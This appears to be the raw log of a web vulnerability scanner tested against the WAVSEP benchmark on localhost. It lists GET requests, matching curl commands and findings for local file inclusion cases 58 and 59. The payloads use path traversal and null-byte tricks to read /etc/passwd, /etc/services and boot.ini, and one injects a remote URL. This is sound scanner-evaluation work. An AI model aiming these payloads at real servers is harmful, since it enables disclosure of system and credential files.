GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
